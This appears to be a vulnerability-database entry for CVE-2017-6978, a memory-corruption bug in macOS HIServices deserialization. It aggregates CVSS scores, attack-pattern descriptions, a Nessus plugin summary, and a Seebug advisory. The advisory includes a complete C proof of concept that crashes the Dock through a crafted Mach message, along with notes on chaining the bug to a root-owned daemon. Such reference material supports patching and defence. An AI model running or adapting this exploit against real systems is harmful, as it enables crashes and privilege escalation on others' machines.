Vulnerabilities > CVE-2017-6978 - Improper Restriction of Operations within the Bounds of a Memory Buffer vulnerability in Apple mac OS X

047910
CVSS 9.3 - CRITICAL
Attack vector
NETWORK
Attack complexity
MEDIUM
Privileges required
NONE
Confidentiality impact
COMPLETE
Integrity impact
COMPLETE
Availability impact
COMPLETE
network
apple
CWE-119
critical
nessus
exploit available

Summary

An issue was discovered in certain Apple products. macOS before 10.12.5 is affected. The issue involves the "Accessibility Framework" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app.

Vulnerable Configurations

Part Description Count
OS
Apple
105

Common Attack Pattern Enumeration and Classification (CAPEC)

  • Buffer Overflow via Environment Variables
    This attack pattern involves causing a buffer overflow through manipulation of environment variables. Once the attacker finds that they can modify an environment variable, they may try to overflow associated buffers. This attack leverages implicit trust often placed in environment variables.
  • Overflow Buffers
    Buffer Overflow attacks target improper or missing bounds checking on buffer operations, typically triggered by input injected by an attacker. As a consequence, an attacker is able to write past the boundaries of allocated buffer regions in memory, causing a program crash or potentially redirection of execution as per the attackers' choice.
  • Client-side Injection-induced Buffer Overflow
    This type of attack exploits a buffer overflow vulnerability in targeted client software through injection of malicious content from a custom-built hostile service.
  • Filter Failure through Buffer Overflow
    In this attack, the idea is to cause an active filter to fail by causing an oversized transaction. An attacker may try to feed overly long input strings to the program in an attempt to overwhelm the filter (by causing a buffer overflow) and hoping that the filter does not fail securely (i.e. the user input is let into the system unfiltered).
  • MIME Conversion
    An attacker exploits a weakness in the MIME conversion routine to cause a buffer overflow and gain control over the mail server machine. The MIME system is designed to allow various different information formats to be interpreted and sent via e-mail. Attack points exist when data are converted to MIME compatible format and back.

Exploit-Db

descriptionApple macOS - Local Privilege Escalation Due to Lack of Bounds Checking in HIServices Custom CFObject Serialization. CVE-2017-6978. Dos exploit for macOS pla...
fileexploits/macos/dos/42056.c
idEDB-ID:42056
last seen2017-05-25
modified2017-05-23
platformmacos
port
published2017-05-23
reporterExploit-DB
sourcehttps://www.exploit-db.com/download/42056/
titleApple macOS - Local Privilege Escalation Due to Lack of Bounds Checking in HIServices Custom CFObject Serialization
typedos

Nessus

NASL familyMacOS X Local Security Checks
NASL idMACOS_10_12_5.NASL
descriptionThe remote host is running a version of macOS that is 10.12.x prior to 10.12.5. It is, therefore, affected by multiple vulnerabilities : - Multiple memory corruption issues exist in the Kernel component that allow a local attacker to gain kernel-level privileges. (CVE-2017-2494, CVE-2017-2546) - A state management flaw exists in the iBooks component due to improper handling of URLs. An unauthenticated, remote attacker can exploit this, via a specially crafted book, to open arbitrary websites without user permission. (CVE-2017-2497) - A local privilege escalation vulnerability exists in the Kernel component due to a race condition. A local attacker can exploit this to execute arbitrary code with kernel-level privileges. (CVE-2017-2501) - An information disclosure vulnerability exists in the CoreAudio component due to improper sanitization of user-supplied input. A local attacker can exploit this to read the contents of restricted memory. (CVE-2017-2502) - A memory corruption issue exists in the Intel graphics driver component that allows a local attacker to execute arbitrary code with kernel-level privileges. CVE-2017-2503) - Multiple information disclosure vulnerabilities exist in the Kernel component due to improper sanitization of user-supplied input. A local attacker can exploit these to read the contents of restricted memory. (CVE-2017-2507, CVE-2017-2509, CVE-2017-2516, CVE-2017-6987) - A memory corruption issue exists in the Sandbox component that allows an unauthenticated, remote attacker to escape an application sandbox. (CVE-2017-2512) - A use-after-free error exists in the SQLite component when handling SQL queries. An unauthenticated, remote attacker can exploit this to deference already freed memory, resulting in the execution of arbitrary code. (CVE-2017-2513) - Multiple buffer overflow conditions exist in the SQLite component due to the improper validation of user-supplied input. An unauthenticated, remote attacker can exploit these, via a specially crafted SQL query, to execute arbitrary code. (CVE-2017-2518, CVE-2017-2520) - A memory corruption issue exists in the SQLite component when handling SQL queries. An unauthenticated, remote attacker can exploit this, via a specially crafted SQL query, to execute arbitrary code. (CVE-2017-2519) - An unspecified memory corruption issue exists in the TextInput component when parsing specially crafted data. An unauthenticated, remote attacker can exploit this to execute arbitrary code. (CVE-2017-2524) - A flaw exists in the CoreAnimation component when handling specially crafted data. An unauthenticated, remote attacker can exploit this to execute arbitrary code. (CVE-2017-2527) - A race condition exists in the DiskArbitration feature that allow a local attacker to gain system-level privileges. (CVE-2017-2533) - An unspecified flaw exists in the Speech Framework that allows a local attacker to escape an application sandbox. (CVE-2017-2534) - A resource exhaustion issue exists in the Security component due to improper validation of user-supplied input. A local attacker can exploit this to exhaust resources and escape an application sandbox. (CVE-2017-2535) - Multiple memory corruption issues exist in the WindowServer component that allow a local attacker to execute arbitrary code with system-level privileges. (CVE-2017-2537, CVE-2017-2548) - An information disclosure vulnerability exists in WindowServer component in the _XGetConnectionPSN() function due to improper validation of user-supplied input. A local attacker can exploit this to read the contents of restricted memory. (CVE-2017-2540) - A stack-based buffer overflow condition exists in the WindowServer component in the _XGetWindowMovementGroup() function due to improper validation of user-supplied input. A local attacker can exploit this to execute arbitrary code with the privileges of WindowServer. (CVE-2017-2541) - Multiple memory corruption issues exist in the Multi-Touch component that allow a local attacker to execute arbitrary code with kernel-level privileges. (CVE-2017-2542, CVE-2017-2543) - A use-after-free error exists in the IOGraphic component that allows a local attacker to execute arbitrary code with kernel-level privileges. (CVE-2017-2545) - A flaw exists in the Speech Framework, specifically within the speechsynthesisd service, due to improper validation of unsigned dynamic libraries (.dylib) before being loaded. A local attacker can exploit this to bypass the application
last seen2020-06-01
modified2020-06-02
plugin id100270
published2017-05-18
reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
sourcehttps://www.tenable.com/plugins/nessus/100270
titlemacOS 10.12.x < 10.12.5 Multiple Vulnerabilities

Seebug

bulletinFamilyexploit
descriptionHIServices.framework is used by a handful of deamons and implements its own CFObject serialization mechanism. The entrypoint to the deserialization code is AXUnserializeCFType; it reads a type field and uses that to index an array of function pointers for the support types: ``` __const:0000000000053ED0 _sUnserializeFunctions dq offset _cfStringUnserialize __const:0000000000053ED0 ; DATA XREF: _AXUnserializeCFType+7Co __const:0000000000053ED0 ; _cfDictionaryUnserialize+E4o ... __const:0000000000053ED8 dq offset _cfNumberUnserialize __const:0000000000053EE0 dq offset _cfBooleanUnserialize __const:0000000000053EE8 dq offset _cfArrayUnserialize __const:0000000000053EF0 dq offset _cfDictionaryUnserialize __const:0000000000053EF8 dq offset _cfDataUnserialize __const:0000000000053F00 dq offset _cfDateUnserialize __const:0000000000053F08 dq offset _cfURLUnserialize __const:0000000000053F10 dq offset _cfNullUnserialize __const:0000000000053F18 dq offset _cfAttributedStringUnserialize __const:0000000000053F20 dq offset _axElementUnserialize __const:0000000000053F28 dq offset _axValueUnserialize __const:0000000000053F30 dq offset _cgColorUnserialize __const:0000000000053F38 dq offset _axTextMarkerUnserialize __const:0000000000053F40 dq offset _axTextMarkerRangeUnserialize __const:0000000000053F48 dq offset _cgPathUnserialize ``` From a cursory inspection it's clear that these methods don't expect to parse untrusted data. The first method, cfStringUnserialize, trusts the length field in the serialized representation and uses that to byte-swap the string without any bounds checking leading to memory corruption. I would guess that all the other unserialization methods should also be closely examined. This poc talks to the com.apple.dock.server service hosted by the Dock process. Although this also runs as the regular user (so doesn't represent much of a priv-esc) this same serialization mechanism is also used in replies to dock clients. com.apple.uninstalld is a client of the Dock and runs as root so by first exploiting this bug to gain code execution as the Dock process, we could trigger the same bug in uninstalld when it parses a reply from the dock and get code execution as root. This poc just crashes the Dock process though. Amusingly this opensource facebook code on github contains a workaround for a memory safety issue in cfAttributedStringUnserialize: https://github.com/facebook/WebDriverAgent/pull/99/files Tested on MacOS 10.12.3 (16D32) ``` #include <stdio.h> #include <stdlib.h> #include <string.h> #include <mach/mach.h> #include <mach/message.h> #include <servers/bootstrap.h> struct dock_msg { mach_msg_header_t hdr; mach_msg_body_t body; mach_msg_ool_descriptor_t ool_desc; uint8_t PAD[0xc]; uint32_t ool_size; }; int main() { kern_return_t err; mach_port_t service_port; err = bootstrap_look_up(bootstrap_port, "com.apple.dock.server", &service_port); if (err != KERN_SUCCESS) { printf(" [-] unable to lookup service"); exit(EXIT_FAILURE); } printf("got service port: %x\n", service_port); uint32_t serialized_string[] = { 'abcd', // neither 'owen' or 'aela' -> bswap? 0x0, // type = cfStringUnserialize 0x41414141, // length 0x41414141, // length 0x1, // contents 0x2, 0x3 }; struct dock_msg m = {0}; m.hdr.msgh_size = sizeof(struct dock_msg); m.hdr.msgh_local_port = MACH_PORT_NULL; m.hdr.msgh_remote_port = service_port; m.hdr.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0); m.hdr.msgh_bits |= MACH_MSGH_BITS_COMPLEX; m.hdr.msgh_id = 0x178f4; // first message in com.apple.dock.server mig subsystem m.ool_size = sizeof(serialized_string); m.body.msgh_descriptor_count = 1; m.ool_desc.type = MACH_MSG_OOL_DESCRIPTOR; m.ool_desc.address = serialized_string; m.ool_desc.size = sizeof(serialized_string); m.ool_desc.deallocate = 0; m.ool_desc.copy = MACH_MSG_PHYSICAL_COPY; err = mach_msg(&m.hdr, MACH_SEND_MSG, m.hdr.msgh_size, 0, MACH_PORT_NULL, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL); if (err != KERN_SUCCESS) { printf(" [-] mach_msg failed with error code:%x\n", err); exit(EXIT_FAILURE); } printf(" [+] looks like that sent?\n"); return 0; } ```
idSSV:93151
last seen2017-11-19
modified2017-05-26
published2017-05-26
reporterRoot
titleApple macOS - Local Privilege Escalation Vulnerability(CVE-2017-6978)